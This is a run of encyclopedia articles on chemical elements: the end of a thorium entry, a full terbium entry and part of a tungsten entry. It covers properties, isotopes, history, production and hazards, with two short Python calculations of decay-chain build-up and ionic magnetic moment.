dangerous to work with, and the impracticality of their separation limits the possibilities of nuclear proliferation using 233U as the fissile material. 
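The timescales in the 232Th → 233Th → 233Pa → 233U breeding chain shown earlier in this section can be made concrete with the standard two-step Bateman decay solution. The Python sketch below uses only the half-lives quoted above (21.8 minutes for 233Th and 27 days for 233Pa) and, as a simplification, ignores neutron capture on 233Pa; the alpha decay of 233U is negligible on these timescales:

import math

HALF_LIFE_TH233_DAYS = 21.8 / (60 * 24)  # 21.8 minutes, converted to days
HALF_LIFE_PA233_DAYS = 27.0

def decay_constant(half_life_days):
    return math.log(2) / half_life_days

def u233_fraction(t_days):
    """Fraction of an initial batch of 233Th converted to 233U after t days,
    via the chain 233Th -> 233Pa -> 233U (two successive beta decays)."""
    l1 = decay_constant(HALF_LIFE_TH233_DAYS)
    l2 = decay_constant(HALF_LIFE_PA233_DAYS)
    remaining_th = math.exp(-l1 * t_days)
    # Bateman solution for the intermediate nuclide 233Pa:
    remaining_pa = l1 / (l2 - l1) * (math.exp(-l1 * t_days) - math.exp(-l2 * t_days))
    return 1.0 - remaining_th - remaining_pa

for t in (1, 27, 90, 270):
    print(f"after {t:3d} days: {u233_fraction(t):6.1%} converted to 233U")

The 233Th step is over within hours, so the month-scale 233Pa decay dominates: about half of the bred material is available as 233U after one 233Pa half-life, and nearly all of it after several months, which is why the handling of 233Pa matters for reactor design (discussed next).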
233Pa has a relatively long half-life of 27 days and a high cross section for neutron capture. Thus it is a neutron poison: instead of rapidly decaying to the useful 233U, a significant amount of 233Pa converts to 234U and consumes neutrons, degrading the reactor efficiency. To avoid this, 233Pa is extracted from the active zone of thorium molten salt reactors during their operation, so that it does not have a chance to capture a neutron and will only decay to 233U. The irradiation of 232Th with neutrons, followed by its processing, need to be mastered before these advantages can be realised, and this requires more advanced technology than the uranium and plutonium fuel cycle; research continues in this area. Others cite the low commercial viability of the thorium fuel cycle: the international Nuclear Energy Agency predicts that the thorium cycle will never be commercially viable while uranium is available in abundance—a situation which may persist "in the coming decades". The isotopes produced in the thorium fuel cycle are mostly not transuranic, but some of them are still very dangerous, such as 231Pa, which has a half-life of 32,760 years and is a major contributor to the long-term radiotoxicity of spent nuclear fuel. Hazards and health effects Radiological Natural thorium decays very slowly compared to many other radioactive materials, and the emitted alpha radiation cannot penetrate human skin. As a result, handling small amounts of thorium, such as those in gas mantles, is considered safe, although the use of such items may pose some risks. Exposure to an aerosol of thorium, such as contaminated dust, can lead to increased risk of cancers of the lung, pancreas, and blood, as lungs and other internal organs can be penetrated by alpha radiation. Internal exposure to thorium leads to increased risk of liver diseases. The decay products of 232Th include more dangerous radionuclides such as radium and radon. Although relatively little of those products are created as the result of the slow decay of thorium, a proper assessment of the radiological toxicity of 232Th must include the contribution of its daughters, some of which are dangerous gamma emitters, and which are built up quickly following the initial decay of 232Th due to the absence of long-lived nuclides along the decay chain. As the dangerous daughters of thorium have much lower melting points than thorium dioxide, they are volatilised every time the mantle is heated for use. In the first hour of use large fractions of the thorium daughters 224Ra, 228Ra, 212Pb, and 212Bi are released. Most of the radiation dose by a normal user arises from inhaling the radium, resulting in a radiation dose of up to 0.2 millisieverts per use, about a third of the dose sustained during a mammogram. Some nuclear safety agencies make recommendations about the use of thorium mantles and have raised safety concerns regarding their manufacture and disposal; the radiation dose from one mantle is not a serious problem, but that from many mantles gathered together in factories or landfills is. Biological Thorium is odourless and tasteless. The chemical toxicity of thorium is low because thorium and its most common compounds (mostly the dioxide) are poorly soluble in water, precipitating out before entering the body as the hydroxide. Some thorium compounds are chemically moderately toxic, especially in the presence of strong complex-forming ions such as citrate that carry the thorium into the body in soluble form. 
If a thorium-containing object has been chewed or sucked, it loses 0.4% of thorium and 90% of its dangerous daughters to the body. Three-quarters of the thorium that has penetrated the body accumulates in the skeleton. Absorption through the skin is possible, but is not a likely means of exposure. Thorium's low solubility in water also means that excretion of thorium by the kidneys and faeces is rather slow. Tests on the thorium uptake of workers involved in monazite processing showed thorium levels above recommended limits in their bodies, but no adverse effects on health were found at those moderately low concentrations. No chemical toxicity has yet been observed in the tracheobronchial tract and the lungs from exposure to thorium. People who work with thorium compounds are at a risk of dermatitis. It can take as much as thirty years after the ingestion of thorium for symptoms to manifest themselves. Thorium has no known biological role. Chemical Powdered thorium metal is pyrophoric: it ignites spontaneously in air. In 1964, the United States Department of the Interior listed thorium as "severe" on a table entitled "Ignition and explosibility of metal powders". Its ignition temperature was given as 270 °C (520 °F) for dust clouds and 280 °C (535 °F) for layers. Its minimum explosive concentration was listed as 0.075 oz/cu ft (0.075 kg/m3); the minimum igniting energy for (non-submicron) dust was listed as 5 mJ. In 1956, the Sylvania Electric Products explosion occurred during reprocessing and burning of thorium sludge in New York City, United States. Nine people were injured; one died of complications caused by third-degree burns. Exposure routes Thorium exists in very small quantities everywhere on Earth although larger amounts exist in certain parts: the average human contains about 40 micrograms of thorium and typically consumes three micrograms per day. Most thorium exposure occurs through dust inhalation; some thorium comes with food and water, but because of its low solubility, this exposure is negligible. Exposure is raised for people who live near thorium deposits or radioactive waste disposal sites, those who live near or work in uranium, phosphate, or tin processing factories, and for those who work in gas mantle production. Thorium is especially common in the Tamil Nadu coastal areas of India, where residents may be exposed to a naturally occurring radiation dose ten times higher than the worldwide average. It is also common in northern Brazilian coastal areas, from south Bahia to Guarapari, a city with radioactive monazite sand beaches, with radiation levels up to 50 times higher than world average background radiation. Another possible source of exposure is thorium dust produced at weapons testing ranges, as thorium is used in the guidance systems of some missiles. This has been blamed for a high incidence of birth defects and cancer at Salto di Quirra on the Italian island of Sardinia.
Physical sciences
Chemical elements_2
null
30045
https://en.wikipedia.org/wiki/Terbium
Terbium
Terbium is a chemical element; it has the symbol Tb and atomic number 65. It is a silvery-white, rare earth metal that is malleable and ductile. The ninth member of the lanthanide series, terbium is a fairly electropositive metal that reacts with water, evolving hydrogen gas. Terbium is never found in nature as a free element, but it is contained in many minerals, including cerite, gadolinite, monazite, xenotime and euxenite. Swedish chemist Carl Gustaf Mosander discovered terbium as a chemical element in 1843. He detected it as an impurity in yttrium oxide (). Yttrium and terbium, as well as erbium and ytterbium, are named after the village of Ytterby in Sweden. Terbium was not isolated in pure form until the advent of ion exchange techniques. Terbium is used to dope calcium fluoride, calcium tungstate and strontium molybdate in solid-state devices, and as a crystal stabilizer of fuel cells that operate at elevated temperatures. As a component of Terfenol-D (an alloy that expands and contracts when exposed to magnetic fields more than any other alloy), terbium is of use in actuators, in naval sonar systems and in sensors. Terbium is considered non-hazardous, though its biological role and toxicity have not been researched in depth. Most of the world's terbium supply is used in green phosphors. Terbium oxide is used in fluorescent lamps and television and monitor cathode-ray tubes (CRTs). Terbium green phosphors are combined with divalent europium blue phosphors and trivalent europium red phosphors to provide trichromatic lighting technology, a high-efficiency white light used in indoor lighting. Characteristics Physical properties Terbium is a silvery-white rare earth metal that is malleable, ductile and soft enough to be cut with a knife. It is relatively stable in air compared to the more reactive lanthanides in the first half of the lanthanide series. Terbium exists in two crystal allotropes with a transformation temperature of 1289 °C between them. The 65 electrons of a terbium atom are arranged in the electron configuration [Xe]4f96s2. The eleven 4f and 6s electrons are valence. Only three electrons can be removed before the nuclear charge becomes too great to allow further ionization, but in the case of terbium, the stability of the half-filled [Xe]4f7 configuration allows further ionization of a fourth electron in the presence of very strong oxidizing agents such as fluorine gas. The terbium(III) cation (Tb3+) is brilliantly fluorescent, in a bright lemon-yellow color that is the result of a strong green emission line in combination with other lines in the orange and red. The yttrofluorite variety of the mineral fluorite owes its creamy-yellow fluorescence in part to terbium. Terbium easily oxidizes, and is therefore used in its elemental form specifically for research. Single terbium atoms have been isolated by implanting them into fullerene molecules. Trivalent europium (Eu3+) and Tb3+ ions are among the lanthanide ions that have garnered the most attention because of their strong luminosity and great color purity. Terbium has a simple ferromagnetic ordering at temperatures below 219 K. Above 219 K, it turns into a helical antiferromagnetic state in which all of the atomic moments in a particular basal plane layer are parallel and oriented at a fixed angle to the moments of adjacent layers. This antiferromagnetism transforms into a disordered paramagnetic state at 230 K. 
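As a rough illustration of the magnetism underlying these ordered phases, the free-ion moment of Tb3+ can be estimated from Hund's rules. The quantum numbers in the Python sketch below (S = 3, L = 3, J = 6 for the 4f8 configuration of Tb3+) are standard textbook values assumed for illustration, not figures stated in this article:

import math

# Hund's rules for Tb3+ (4f8): shell more than half full, so J = L + S.
S, L = 3.0, 3.0
J = L + S

# Lande g-factor and effective paramagnetic moment in Bohr magnetons:
g_J = 1 + (J * (J + 1) + S * (S + 1) - L * (L + 1)) / (2 * J * (J + 1))
mu_eff = g_J * math.sqrt(J * (J + 1))

print(f"g_J = {g_J:.2f}")                       # 1.50
print(f"mu_eff = {mu_eff:.2f} Bohr magnetons")  # about 9.7

The resulting moment of roughly 9.7 Bohr magnetons is among the largest of any free ion, consistent with the robust ferromagnetic and helical antiferromagnetic ordering described above.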
Chemical properties Terbium metal is an electropositive element and oxidizes in the presence of most acids (such as sulfuric acid), all of the halogens, and water. Terbium oxidizes readily in air to form a mixed terbium(III,IV) oxide: 8 Tb + 7 O2 → 2 Tb4O7 The most common oxidation state of terbium is +3 (trivalent), such as in terbium(III) oxide (Tb2O3). In the solid state, tetravalent terbium is also known, in compounds such as terbium dioxide (TbO2) and terbium tetrafluoride. In solution, terbium typically forms trivalent species, but can be oxidized to the tetravalent state with ozone in highly basic aqueous conditions. The coordination and organometallic chemistry of terbium is similar to that of other lanthanides. In aqueous conditions, terbium can be coordinated by nine water molecules, which are arranged in a tricapped trigonal prismatic molecular geometry. Complexes of terbium with lower coordination numbers are also known, typically with bulky ligands like bis(trimethylsilyl)amide, which forms the three-coordinate tris[N,N-bis(trimethylsilyl)amide]terbium(III) complex, Tb[N(SiMe3)2]3. Most coordination and organometallic complexes contain terbium in the trivalent oxidation state. Divalent Tb2+ complexes are also known, usually with bulky cyclopentadienyl-type ligands. A few coordination compounds containing terbium in its tetravalent state are also known. Oxidation states Like most rare-earth elements and lanthanides, terbium is usually found in the +3 oxidation state. Like cerium and praseodymium, terbium can also form a +4 oxidation state, although it is unstable in water. It is also possible for terbium to be found in the 0, +1, and +2 oxidation states. Compounds Terbium combines with nitrogen, carbon, sulfur, phosphorus, boron, selenium, silicon and arsenic at elevated temperatures, forming various binary compounds. In these compounds, terbium mainly exhibits the oxidation state +3, with the +2 state appearing rarely. Terbium(II) halides are obtained by annealing terbium(III) halides in the presence of metallic terbium in tantalum containers. Terbium also forms the sesquichloride Tb2Cl3, which can be further reduced to terbium(I) chloride (TbCl) by annealing at 800 °C; this compound forms platelets with a layered graphite-like structure. Terbium(IV) fluoride (TbF4) is the only halide that tetravalent terbium can form. It has strong oxidizing properties and is a strong fluorinating agent, emitting relatively pure atomic fluorine when heated, rather than the mixture of fluoride vapors emitted by cobalt(III) fluoride or cerium(IV) fluoride. It can be obtained by reacting terbium(III) chloride or terbium(III) fluoride with fluorine gas at 320 °C: 2 TbF3 + F2 → 2 TbF4 When TbF4 and caesium fluoride (CsF) are mixed in a stoichiometric ratio in a fluorine gas atmosphere, caesium pentafluoroterbate (CsTbF5) is obtained. It is an orthorhombic crystal with space group Cmca and a layered structure composed of [TbF8]4− and 11-coordinated Cs+. The compound barium hexafluoroterbate (BaTbF6), an orthorhombic crystal with space group Cmma, can be prepared by a similar method. The terbium fluoride ion [TbF8]4− also exists in the structure of potassium terbium fluoride crystals. Terbium(III) oxide or terbia is the main oxide of terbium, and appears as a dark brown water-insoluble solid. It is slightly hygroscopic and is the main terbium compound found in rare earth-containing minerals and clays. 
Other compounds include the chloride TbCl3, the bromide TbBr3, the iodide TbI3, and the fluorides TbF3 and TbF4. Isotopes Naturally occurring terbium is composed of its only stable isotope, terbium-159; the element is thus mononuclidic and monoisotopic. Thirty-nine radioisotopes have been characterized, with the heaviest being terbium-174 and the lightest being terbium-135 (both with unknown exact mass). The most stable synthetic radioisotopes of terbium are terbium-158, with a half-life of 180 years, and terbium-157, with a half-life of 71 years. All of the remaining radioactive isotopes have half-lives of less than three months, and the majority of these have half-lives of less than half a minute. The primary decay mode before the most abundant stable isotope, 159Tb, is electron capture, which results in the production of gadolinium isotopes, and the primary mode after is beta minus decay, resulting in dysprosium isotopes. The element also has 31 nuclear isomers, with masses of 141–154, 156, 158, 162, and 164–168 (not every mass number corresponds to only one isomer). The most stable of them are terbium-156m, with a half-life of 24.4 hours, and terbium-156m2, with a half-life of 22.7 hours; this is longer than the half-lives of most ground states of radioactive terbium isotopes, except those with mass numbers 155–161. Terbium-149, with a half-life of 4.1 hours, is a promising candidate in targeted alpha therapy and positron emission tomography. History Swedish chemist Carl Gustaf Mosander discovered terbium in 1843. He detected it as an impurity in yttrium oxide, Y2O3, then known as yttria. Yttrium, erbium, and terbium are all named after the village of Ytterby in Sweden. Terbium was not isolated in pure form until the advent of ion exchange techniques. Mosander first separated yttria into three fractions, all named for the ore: yttria, erbia, and terbia. "Terbia" was originally the fraction that contained the pink color, due to the element now known as erbium. "Erbia", the oxide containing what is now known as terbium, originally was the fraction that was yellow or dark orange in solution. The insoluble oxide of this element was noted to be tinged brown, and soluble oxides after combustion were noted to be colorless. Until the advent of spectral analysis, arguments went back and forth as to whether erbia even existed. Spectral analysis by Marc Delafontaine allowed the separate elements and their oxides to be identified, but in his publications the names of erbium and terbium were switched, following a brief period in which terbium was renamed "mosandrum", after Mosander. The names have remained switched ever since. The early years of preparing terbium (as terbium oxide) were difficult. Metal oxides from gadolinite and samarskite were dissolved in nitric acid, and the solution was further separated using oxalic acid and potassium sulfate. There was great difficulty in separating erbia from terbia; in 1881, it was noted that there was no satisfactory method to separate the two. By 1914, different solvents had been used to separate terbium from its host minerals, but the process of separating terbium from its neighbor elements, gadolinium and dysprosium, was described as "tedious" but possible. Modern terbium extraction methods are based on the liquid–liquid extraction process developed by Werner Fischer et al. in 1937. Occurrence Terbium occurs with other rare earth elements in many minerals, including monazite (with up to 0.03% terbium), xenotime (YPO4) and euxenite (with 1% or more terbium). 
The crustal abundance of terbium is estimated as 1.2 mg/kg. No terbium-dominant mineral has yet been found. Terbium (as the species Tb II) has been detected in the atmosphere of KELT-9b, a hot-Jupiter planet outside the Solar System. Currently, the richest commercial sources of terbium are the ion-adsorption clays of southern China; the concentrates with about two-thirds yttrium oxide by weight have about 1% terbia. Small amounts of terbium occur in bastnäsite and monazite; when these are processed by solvent extraction to recover the valuable heavy lanthanides as samarium-europium-gadolinium concentrate, terbium is recovered therein. Due to the large volumes of bastnäsite processed relative to the ion-adsorption clays, a significant proportion of the world's terbium supply comes from bastnäsite. In 2018, a rich terbium supply was discovered off the coast of Japan's Minamitori Island, with the stated supply being "enough to meet the global demand for 420 years". Production Crushed terbium-containing minerals are treated with hot concentrated sulfuric acid to produce water-soluble sulfates of rare earths. The acidic filtrates are partially neutralized with caustic soda to pH 3–4. Thorium precipitates out of solution as hydroxide and is removed. The solution is then treated with ammonium oxalate to convert the rare earths into their insoluble oxalates. The oxalates are decomposed to oxides by heating. The oxides are dissolved in nitric acid, which excludes one of the main components, cerium, whose oxide is insoluble in HNO3. Terbium is separated as a double salt with ammonium nitrate by crystallization. The most efficient separation routine for terbium salt from the rare-earth salt solution is ion exchange. In this process, rare-earth ions are sorbed onto a suitable ion-exchange resin by exchange with hydrogen, ammonium or cupric ions present in the resin. The rare earth ions are then selectively washed out by suitable complexing agents. As with other rare earths, terbium metal is produced by reducing the anhydrous chloride or fluoride with calcium metal. Calcium and tantalum impurities can be removed by vacuum remelting, distillation, amalgam formation or zone melting. In 2020, the annual demand for terbium was estimated at . Terbium is not distinguished from other rare earths in the United States Geological Survey's Mineral Commodity Summaries, which in 2024 estimated the global reserves of rare earth minerals at . Applications Terbium is used as a dopant in calcium fluoride, calcium tungstate, and strontium molybdate, materials that are used in solid-state devices, and as a crystal stabilizer of fuel cells which operate at elevated temperatures, together with zirconium dioxide (ZrO2). Terbium is also used in alloys and in the production of electronic devices. As a component of Terfenol-D, terbium is used in actuators, in naval sonar systems, sensors, and other magnetomechanical devices. Terfenol-D is a terbium alloy that expands or contracts in the presence of a magnetic field. It has the highest magnetostriction of any alloy. Terbium is also used to increase the Verdet constant in long-distance fiber optic communication. Terbium-doped garnets are also used in optical isolators, which prevent reflected light from traveling back along the optical fiber. Terbium oxides are used in green phosphors in fluorescent lamps, color TV tubes, and flat screen monitors. Terbium, along with all other lanthanides except lanthanum and lutetium, is luminescent in the 3+ oxidation state. 
The brilliant fluorescence allows terbium to be used as a probe in biochemistry, where it somewhat resembles calcium in its behavior. Terbium "green" phosphors (which fluoresce a brilliant lemon-yellow) are combined with divalent europium blue phosphors and trivalent europium red phosphors to provide trichromatic lighting, which is by far the largest consumer of the world's terbium supply. Trichromatic lighting provides much higher light output for a given amount of electrical energy than does incandescent lighting. In 2023, terbium compounds were used to create a lattice with a single iron atom, which was then examined by a synchrotron X-ray beam. This was the first successful attempt to characterize a single atom at sub-atomic levels. Safety Terbium, along with many of the other rare earth elements, is poorly studied in terms of its toxicology and environmental impacts. Few health-based guidance values for safe exposure to terbium are available. No values are established in the United States by the Occupational Safety and Health Administration or the American Conference of Governmental Industrial Hygienists at which terbium exposure becomes hazardous, and it is not considered a hazardous substance under the Globally Harmonized System of Classification and Labelling of Chemicals. Reviews of the toxicity of the rare earth elements place terbium and its compounds as of "low to moderate toxicity", remarking on the lack of detailed studies of their hazards and on the lack of market demand forestalling evidence of toxicity. Some studies demonstrate environmental accumulation of terbium as hazardous to fish and plants. High exposures to terbium may enhance the toxicity of other substances by causing endocytosis in plant cells.
Physical sciences
Chemical elements_2
null
30046
https://en.wikipedia.org/wiki/Tungsten
Tungsten
Tungsten (also called wolfram) is a chemical element; it has symbol W and atomic number 74. It is a rare metal found naturally on Earth almost exclusively as compounds with other elements. It was identified as a distinct element in 1781 and first isolated as a metal in 1783. Its important ores include scheelite and wolframite, the latter lending the element its alternative name. The free element is remarkable for its robustness, especially the fact that it has the highest melting point of all known elements, melting at 3,422 °C. It also has the highest boiling point, at 5,930 °C. Its density is 19.254 g/cm3, comparable with that of uranium and gold, and much higher (about 1.7 times) than that of lead. Polycrystalline tungsten is an intrinsically brittle and hard material (under standard conditions, when uncombined), making it difficult to work. However, pure single-crystalline tungsten is more ductile and can be cut with a hard-steel hacksaw. Tungsten occurs in many alloys, which have numerous applications, including incandescent light bulb filaments, X-ray tubes, electrodes in gas tungsten arc welding, superalloys, and radiation shielding. Tungsten's hardness and high density make it suitable for military applications in penetrating projectiles. Tungsten compounds are often used as industrial catalysts. Its largest use is in tungsten carbide, a wear-resistant material used in metalworking, mining, and construction. About 50% of tungsten is used in tungsten carbide, with the remaining major use being alloys and steels; less than 10% is used in other compounds. Tungsten is the only metal in the third transition series that is known to occur in biomolecules, being found in a few species of bacteria and archaea. However, tungsten interferes with molybdenum and copper metabolism and is somewhat toxic to most forms of animal life. Characteristics Physical properties In its raw form, tungsten is a hard steel-grey metal that is often brittle and hard to work. Purified, monocrystalline tungsten retains its hardness (which exceeds that of many steels) and becomes malleable enough that it can be worked easily. It is worked by forging, drawing, or extruding, but it is more commonly formed by sintering. Of all metals in pure form, tungsten has the highest melting point, the lowest vapor pressure (at temperatures above 1,650 °C), and the highest tensile strength. Although carbon remains solid at higher temperatures than tungsten, carbon sublimes at atmospheric pressure instead of melting, so it has no melting point. Moreover, tungsten's most stable crystal phase does not exhibit any high-pressure-induced structural transformations for pressures up to at least 364 gigapascals. Tungsten has the lowest coefficient of thermal expansion of any pure metal. The low thermal expansion and the high melting point and tensile strength of tungsten originate from strong covalent bonds formed between tungsten atoms by the 5d electrons. Alloying small quantities of tungsten with steel greatly increases its toughness. Tungsten exists in two major crystalline forms: α and β. The former has a body-centered cubic structure and is the more stable form. The structure of the β phase is called A15 cubic; it is metastable, but can coexist with the α phase at ambient conditions owing to non-equilibrium synthesis or stabilization by impurities. Contrary to the α phase, which crystallizes in isometric grains, the β form exhibits a columnar habit. 
The α phase has one third of the electrical resistivity and a much lower superconducting transition temperature TC relative to the β phase: ca. 0.015 K vs. 1–4 K; mixing the two phases allows obtaining intermediate TC values. The TC value can also be raised by alloying tungsten with another metal (e.g. 7.9 K for W-Tc). Such tungsten alloys are sometimes used in low-temperature superconducting circuits. Isotopes Naturally occurring tungsten consists of four stable isotopes (182W, 183W, 184W, and 186W) and one very long-lived radioisotope, 180W. Theoretically, all five can decay into isotopes of element 72 (hafnium) by alpha emission, but only 180W has been observed to do so, with a half-life of 1.8 × 10^18 years; on average, this yields about two alpha decays of 180W per gram of natural tungsten per year. This rate is equivalent to a specific activity of roughly 63 microbecquerels per kilogram. This rate of decay is orders of magnitude lower than that observed in carbon or potassium as found on Earth, which likewise contain small amounts of long-lived radioactive isotopes. Bismuth was long thought to be non-radioactive, but 209Bi (its longest-lived isotope) actually decays with a half-life of 2.01 × 10^19 years, about a factor of 10 slower than 180W. However, because naturally occurring bismuth is 100% 209Bi, its specific activity is actually higher than that of natural tungsten, at 3 millibecquerels per kilogram. The other naturally occurring isotopes of tungsten have not been observed to decay, constraining their half-lives to be at least 4 × 10^21 years. Another 34 artificial radioisotopes of tungsten have been characterized, the most stable of which are 181W with a half-life of 121.2 days, 185W with a half-life of 75.1 days, 188W with a half-life of 69.4 days, 178W with a half-life of 21.6 days, and 187W with a half-life of 23.72 h. All of the remaining radioactive isotopes have half-lives of less than 3 hours, and most of these have half-lives below 8 minutes. Tungsten also has 12 meta states, with the most stable being 179mW (t1/2 = 6.4 minutes). Chemical properties Tungsten is a mostly non-reactive element: it does not react with water, is immune to attack by most acids and bases, and does not react with oxygen or air at room temperature. At elevated temperatures (i.e., when red-hot) it reacts with oxygen to form the trioxide, tungsten(VI) oxide (WO3). It will, however, react directly with fluorine (F2) at room temperature to form tungsten(VI) fluoride (WF6), a colorless gas. At around 250 °C it will react with chlorine or bromine, and under certain hot conditions will react with iodine. Finely divided tungsten is pyrophoric. The most common formal oxidation state of tungsten is +6, but it exhibits all oxidation states from −2 to +6. Tungsten typically combines with oxygen to form the yellow tungstic oxide, WO3, which dissolves in aqueous alkaline solutions to form tungstate ions, WO42−. Tungsten carbides (W2C and WC) are produced by heating powdered tungsten with carbon. W2C is resistant to chemical attack, although it reacts strongly with chlorine to form tungsten hexachloride (WCl6). In aqueous solution, tungstate gives the heteropoly acids and polyoxometalate anions under neutral and acidic conditions. As tungstate is progressively treated with acid, it first yields the soluble, metastable "paratungstate A" anion, W7O246−, which over time converts to the less soluble "paratungstate B" anion, H2W12O4210−. Further acidification produces the very soluble metatungstate anion, H2W12O406−, after which equilibrium is reached. 
The metatungstate ion exists as a symmetric cluster of twelve tungsten-oxygen octahedra known as the Keggin anion. Many other polyoxometalate anions exist as metastable species. The inclusion of a different atom, such as phosphorus, in place of the two central hydrogens in metatungstate produces a wide variety of heteropoly acids, such as phosphotungstic acid H3PW12O40. Tungsten trioxide can form intercalation compounds with alkali metals. These are known as bronzes; an example is sodium tungsten bronze. In gaseous form, tungsten forms the diatomic species W2. These molecules feature a sextuple bond between tungsten atoms, the highest known bond order among stable atoms. History In 1781, Carl Wilhelm Scheele discovered that a new acid, tungstic acid, could be made from scheelite (at the time called tungsten). Scheele and Torbern Bergman suggested that it might be possible to obtain a new metal by reducing this acid. In 1783, José and Fausto Elhuyar found an acid made from wolframite that was identical to tungstic acid. Later that year, at the Royal Basque Society in the town of Bergara, Spain, the brothers succeeded in isolating tungsten by reduction of this acid with charcoal, and they are credited with the discovery of the element (they called it "wolfram" or "volfram"). The strategic value of tungsten came to notice in the early 20th century. British authorities acted in 1912 to free the Carrock mine from the German-owned Cumbrian Mining Company and, during World War I, to restrict German access elsewhere. In World War II, tungsten played a more significant role in background political dealings. Portugal, as the main European source of the element, was put under pressure from both sides because of its deposits of wolframite ore at Panasqueira. Tungsten's desirable properties, such as resistance to high temperatures, its hardness and density, and its strengthening of alloys, made it an important raw material for the arms industry, both as a constituent of weapons and equipment and employed in production itself, e.g., in tungsten carbide cutting tools for machining steel. Tungsten is now used in many more applications, such as aircraft and motorsport ballast weights, darts, anti-vibration tooling, and sporting equipment. Tungsten is unique amongst the elements in that it has been the subject of patent proceedings. In 1928, a US court rejected General Electric's attempt to patent it, overturning the patent granted in 1913 to William D. Coolidge. It has been suggested that remnants of wolfram may have been found in what may have been the garden of the astronomer and alchemist Tycho Brahe. Etymology The name tungsten (which means "heavy stone" in Swedish and was the old Swedish name for the mineral scheelite and other minerals of similar density) is used in English, French, and many other languages as the name of the element, but wolfram (or volfram) is used in most European (especially Germanic and Slavic) languages and is derived from the mineral wolframite, which is the origin of the chemical symbol W. The name wolframite is derived from German Wolf Rahm ("wolf soot" or "wolf cream"), the name given to tungsten by Johan Gottschalk Wallerius in 1747. This, in turn, derives from Latin lupi spuma, the name Georg Agricola used for the mineral in 1546, which translates into English as "wolf's froth" and is a reference to the large amounts of tin consumed by the mineral during its extraction, as though the mineral devoured it like a wolf. 
This naming follows a tradition of colorful names that miners from the Ore Mountains gave to various minerals, out of a superstition that ores which looked as if they contained then-known valuable metals, yet yielded none when worked, were somehow "hexed". Cobalt (cf. Kobold), pitchblende (cf. German Pech, "bad luck") and nickel (cf. "Old Nick") derive their names from the same miners' idiom. Occurrence Tungsten has thus far not been found in nature in its pure form. Instead, tungsten is found mainly in the minerals wolframite and scheelite. Wolframite is iron–manganese tungstate, (Fe,Mn)WO4, a solid solution of the two minerals ferberite (FeWO4) and hübnerite (MnWO4), while scheelite is calcium tungstate (CaWO4). Other tungsten minerals range in their level of abundance from moderate to very rare, and have almost no economic value. Chemical compounds Tungsten forms chemical compounds in oxidation states from −II to +VI. Higher oxidation states, always as oxides, are relevant to its terrestrial occurrence and its biological roles, mid-level oxidation states are often associated with metal clusters, and very low oxidation states are typically associated with CO complexes. The chemistries of tungsten and molybdenum show strong similarities to each other, as well as contrasts with their lighter congener, chromium. The relative rarity of tungsten(III), for example, contrasts with the pervasiveness of the chromium(III) compounds. The highest oxidation state is seen in tungsten(VI) oxide (WO3). Tungsten(VI) oxide is soluble in aqueous base, forming tungstate (WO42−). This oxyanion condenses at lower pH values, forming polyoxotungstates. The broad range of oxidation states of tungsten is reflected in its various chlorides: tungsten(II) chloride, which exists as the hexamer W6Cl12; tungsten(III) chloride, which exists as the hexamer W6Cl18; tungsten(IV) chloride, WCl4, a black solid that adopts a polymeric structure; tungsten(V) chloride, WCl5, a black solid that adopts a dimeric structure; and tungsten(VI) chloride, WCl6, whose stability contrasts with the instability of MoCl6. Organotungsten compounds are numerous and also span a range of oxidation states. Notable examples include the trigonal prismatic W(CH3)6 and octahedral W(CO)6. Production Reserves The world's reserves of tungsten are 3,200,000 tonnes; they are mostly located in China (1,800,000 t), Canada (290,000 t), Russia (160,000 t), Vietnam (95,000 t) and Bolivia. As of 2017, China, Vietnam and Russia are the leading suppliers with 79,000, 7,200 and 3,100 tonnes, respectively. Canada had ceased production in late 2015 due to the closure of its sole tungsten mine. Meanwhile, Vietnam had significantly increased its output in the 2010s, owing to the major optimization of its domestic refining operations, and overtook Russia and Bolivia. China remains the world's leader not only in production, but also in export and consumption of tungsten products. Tungsten production is gradually increasing outside China because of rising demand. Meanwhile, supply from China is strictly regulated by the Chinese government, which fights illegal mining and excessive pollution originating from mining and refining processes. There is a large deposit of tungsten ore on the edge of Dartmoor in the United Kingdom, which was exploited during World War I and World War II as the Hemerdon Mine. Following increases in tungsten prices, this mine was reactivated in 2014, but ceased activities in 2018. Within the EU, the Austrian Felbertal scheelite deposit is one of the few producing tungsten mines. 
Portugal is one of Europe's main tungsten producers, with 121 kt of contained tungsten in mineral concentrates from 1910 to 2020, accounting for roughly 3.3% of the global production. Tungsten is considered to be a conflict mineral due to the unethical mining practices observed in the Democratic Republic of the Congo. South Korea's Sangdong mine, one of the world's largest tungsten mines with a reported 7,890,000 tonnes of high-grade tungsten ore in the ground, was closed in 1994 due to low profitability; its mining rights have since been re-registered, and operations are scheduled to resume in 2024. Extraction Tungsten is extracted from its ores in several stages. The ore is eventually converted to tungsten(VI) oxide (WO3), which is heated with hydrogen or carbon to produce powdered tungsten. Because of tungsten's high melting point, it is not commercially feasible to cast tungsten ingots. Instead, powdered tungsten is mixed with small amounts of powdered nickel or other metals, and sintered. During the sintering process, the nickel diffuses into the tungsten, producing an alloy. Tungsten can also be extracted by hydrogen reduction of WF6: WF6 + 3 H2 → W + 6 HF or by pyrolytic decomposition: WF6 → W + 3 F2 (an endothermic reaction) Tungsten is not traded as a futures contract and cannot be tracked on exchanges like the London Metal Exchange. The tungsten industry often uses independent pricing references such as Argus Media or Metal Bulletin as a basis for contracts. The prices are usually quoted for tungsten concentrate or WO3. Applications Approximately half of the tungsten is consumed for the production of hard materials – namely tungsten carbide – with the remaining major use being in alloys and steels. Less than 10% is used in other chemical compounds. Because of the high ductile-brittle transition temperature of tungsten, its products are conventionally manufactured through powder metallurgy, spark plasma sintering, chemical vapor deposition, hot isostatic pressing, and thermoplastic routes. A more flexible manufacturing alternative is selective laser melting, a form of 3D printing that allows the creation of complex three-dimensional shapes. Industrial Tungsten is mainly used in the production of hard materials based on tungsten carbide (WC), one of the hardest carbides. WC is an efficient electrical conductor, but W2C is less so. WC is used to make wear-resistant abrasives, and "carbide" cutting tools such as knives, drills, circular saws, dies, milling and turning tools used by the metalworking, woodworking, mining, petroleum and construction industries. Carbide tooling is actually a ceramic/metal composite, where metallic cobalt acts as a binding (matrix) material to hold the WC particles in place. This type of industrial use accounts for about 60% of current tungsten consumption. The jewelry industry makes rings of sintered tungsten carbide, tungsten carbide/metal composites, and also metallic tungsten. WC/metal composite rings use nickel as the metal matrix in place of cobalt because it takes a higher luster when polished. Sometimes manufacturers or retailers refer to tungsten carbide as a metal, but it is a ceramic. Because of tungsten carbide's hardness, rings made of this material are extremely abrasion resistant, and will hold a burnished finish longer than rings made of metallic 